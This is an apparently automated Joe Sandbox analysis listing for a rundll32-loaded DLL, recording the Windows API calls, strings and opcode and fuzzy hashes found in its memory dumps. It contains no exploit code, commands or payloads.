                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 808654186-3887548279
                                                                                                                    • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                    • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                    • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                    • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 100161DE
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                    • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                    • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3191170017-0
                                                                                                                    • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                    • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                    • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                    • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                    • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                    • API String ID: 667068680-3617302793
                                                                                                                    • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                    • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                    • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                    • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                    • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                    • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                    • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                    • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                    • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                      • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                    • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                    • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                    • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                    • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1509511306-0
                                                                                                                    • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                    • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                    • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                    • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                    • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                      • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                      • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                    • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                    • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                    • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                    • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                      • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                    • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                    • String ID: AfxOldWndProc423
                                                                                                                    • API String ID: 2702501687-1060338832
                                                                                                                    • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                    • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                    • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                    • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                      • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                    • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                    • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                      • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                      • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                    • _printf.LIBCMT ref: 10012F79
                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                    • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                    • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                    • API String ID: 4222005279-2156106531
                                                                                                                    • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                    • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                    • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                    • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                    • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                    • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                    • __lock.LIBCMT ref: 10035229
                                                                                                                    • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                    • API String ID: 1036688887-2843748187
                                                                                                                    • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                    • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                    • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                    • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                    • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                    • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                    • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                    • String ID: MS Shell Dlg
                                                                                                                    • API String ID: 1736106359-76309092
                                                                                                                    • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                    • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                    • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                    • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                    • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                    • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                    • String ID: System
                                                                                                                    • API String ID: 46613423-3470857405
                                                                                                                    • Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                    • Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
                                                                                                                    • Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                    • Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                    • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                    • _memset.LIBCMT ref: 10020AE2
                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1891723912-0
                                                                                                                    • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                    • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                    • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                    • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                      • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                      • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                    • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                    • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                    • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                    • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                    • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                    • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 317715441-0
                                                                                                                    • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                    • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                    • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                    • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                    • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                    • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                    • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                    • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                      • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                      • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                      • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 168474834-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                    • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1151147025-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

